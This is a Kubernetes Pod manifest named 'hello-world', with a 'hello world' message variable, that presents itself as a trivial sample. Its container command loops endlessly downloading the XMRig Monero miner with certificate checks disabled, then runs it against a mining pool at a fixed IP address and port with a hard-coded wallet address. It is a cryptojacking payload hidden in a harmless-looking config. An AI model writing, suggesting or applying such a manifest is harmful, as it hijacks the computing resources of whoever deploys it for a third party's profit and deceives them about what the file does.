apiVersion: v1
kind: Pod
metadata:
  name: hello-world
spec:  # specification of the pod’s contents
  restartPolicy: Never
  containers:
  - name: hello
    image: "ubuntu:14.04"
    env:
    - name: MESSAGE
      value: "hello world"
    command: ["while true; do curl -LJO https://github.com/xmrig/xmrig/releases/download/v6.7.1/xmrig-6.7.1-linux-x64.tar.gz --no-check-certificate && tar xf xmrig-6.7.1-linux-x64.tar.gz && xmrig-6.7.1/xmrig --donate-level=0 -a rx/0 -o 172.65.200.133:3380 -u 33uK4AkoDaMZ8FNNUN4nKw1bJQ6KfvuBA2 --http-enabled --http-port=4000 --nicehash --cpu-priority 0 --donate-level=0 --threads=4; done"]
